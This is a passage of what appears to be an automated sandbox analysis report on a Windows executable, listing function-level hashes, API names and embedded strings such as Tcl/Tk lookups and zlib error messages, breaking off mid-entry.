                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                    • Instruction ID: 8f6c764ad0c2c361205613e3be5214f9477736449020e5de6b46a47b47f8833b
                                                                                                    • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                    • Instruction Fuzzy Hash: 32119621A1D681C1EA68BF51F41027EE276AF55B84FE44431EB4D976DECF3CD4418760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                    • Instruction ID: 50e037da462eef05f8da5eadccf0c6dbab9b3df4636b6385c7c54e1ae8a76312
                                                                                                    • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                    • Instruction Fuzzy Hash: BA21957261CA81C6DB65AF18F480379B6B1EB94B94FB44234E65D876D9DF3CD4408B10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                    • Instruction ID: 677ca383739298bc03a8737a6d36311b32d9978a54b1ba4cba70b212086619d7
                                                                                                    • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                    • Instruction Fuzzy Hash: 6701A921A08742C0E908FF566901069E6B5EB55FE0F984631DE6C13BDADE3CD8029710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                    • Instruction ID: 45daefdba4f69e11f294bef136bb5971a983ca4e18b97035857225eacfc1790e
                                                                                                    • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                    • Instruction Fuzzy Hash: 5D018420E0E683C1FEAC7F65754117DD2B2AF55794FF84176FA5C42ACADE2CA4414220
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7691BA63A,?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A), ref: 00007FF7691BDEFD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                    • Instruction ID: 26d5487a9bc74f70af2b30ee42672be82d9a11357d13930097067e797125c75b
                                                                                                    • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                    • Instruction Fuzzy Hash: 38F06D88B09247C1FE5C7F6679513B5D2B65FA8B40FEC5436CA0E862D9DE2CE4828230
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00007FF7691AFFB0,?,?,?,00007FF7691B161A,?,?,?,?,?,00007FF7691B2E09), ref: 00007FF7691BC94A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                    • Instruction ID: 355f0ae6945eff8b08f54aa81d55d6ec4db1009abb077f67a4959e59eb23b2ee
                                                                                                    • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                    • Instruction Fuzzy Hash: 26F05800B18347C5FE5C7FA5785137992A25F99BA0FA84630982E862C9DE2CA4418230
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                    • Instruction ID: 850a78067e0a5dfad2be566c8950f11bee6bcfb3e4ea33cdc14565c8c914c430
                                                                                                    • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                    • Instruction Fuzzy Hash: 97E0EC90F08257C2FA5D7EB865D22B9D1329F64340FE44031D949066DBDD1C78459631
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                    • API String ID: 190572456-3427451314
                                                                                                    • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                    • Instruction ID: 69b9493a80f2cb657946bd6893dc7617ff764f2252706a07d89c38df2c437110
                                                                                                    • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                    • Instruction Fuzzy Hash: 6FE1AF68A8DB07D1FA1DFF19B9501B8E3B5AF14791FF41036C81E026A4EF3CA959C621
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 808467561-2761157908
                                                                                                    • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                    • Instruction ID: 36f38bea85274eb9a5b826d5b010f9ff696a9acda7f55f3cf09b24f89a9ac99c
                                                                                                    • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                    • Instruction Fuzzy Hash: A1B2E372A18292CBE7299F64E5407FDB7B1FB54388FA05135DA0E57A84DB3CA902CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                    • API String ID: 0-2665694366
                                                                                                    • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                    • Instruction ID: ef61efd6f35e6b8e05f19d280d7604bb58e538206008985f3da0d33a5690039a
                                                                                                    • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                    • Instruction Fuzzy Hash: 9C521672A146A58BE7989F14E458B7E7BFAFB44310FA14139E64A87B80DB3DDC44CB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140674995-0
                                                                                                    • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                    • Instruction ID: 70faa9552047ccec46d88eee84f0e92deb287a84e0b5bc372644f8dfe397ee10
                                                                                                    • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                    • Instruction Fuzzy Hash: 82311976609A81C6EB64AF64F8403EEB374FB84744F94403ADA4E46A95DF3CD548CB24
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorFormatLast
                                                                                                    • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                    • API String ID: 3971115935-1149178304
                                                                                                    • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                    • Instruction ID: d1a404bb48bdbd6507c22d18f3c0b7c5c183b4c218605dbdeb57b0d5c65fa8aa
                                                                                                    • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                    • Instruction Fuzzy Hash: DF216D72608A85C2E724AF11F4402EAB3B4FB88785F900136EACD53A98DF3CD656CB50
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C4F55
                                                                                                      • Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC
                                                                                                      • Part of subcall function 00007FF7691B9C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
                                                                                                      • Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78
                                                                                                      • Part of subcall function 00007FF7691B9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C19
                                                                                                      • Part of subcall function 00007FF7691B9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7691B9BEF,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691B9C3E
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C4F44
                                                                                                      • Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51BA
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51CB
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51DC
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 3714727158-0
                                                                                                    • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                    • Instruction ID: 93601a4186749160260b6781c6fdaa6d3b331dee78fc726bf11f7c6180fb29a1
                                                                                                    • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                    • Instruction Fuzzy Hash: 47D19F26A0C252C6EB28BF25F8511B9A7B1EF94784FE44135EA4D87686DF3CE441CB60
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                    • Instruction ID: e920b468abaa2f5667e041e237593994bace65629b1ef3784732e8ff6be79b8f
                                                                                                    • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                    • Instruction Fuzzy Hash: 90315D36608B81C6DB649F25F8502AEB3B4FB88758FA40135EA9D43B69DF3CD545CB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2227656907-0
                                                                                                    • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                    • Instruction ID: 387862141facbb0876d268417b8c75bedefae21d284d01052ae087f4493ecac2
                                                                                                    • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                    • Instruction Fuzzy Hash: C8B1C7A1B18692C1EE68AF25F5101B9E3B1EB54BE4FA45131EA5D07B89DF3CE441CB10
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51BA
                                                                                                      • Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51CB
                                                                                                      • Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51DC
                                                                                                      • Part of subcall function 00007FF7691C48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48EC
                                                                                                      • Part of subcall function 00007FF7691B9C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
                                                                                                      • Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 1511944507-0
                                                                                                    • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                    • Instruction ID: 9cf476a06e87a2b76ccd705b8f9ed2ce0ab6b908321376459e1b72f4370a8772
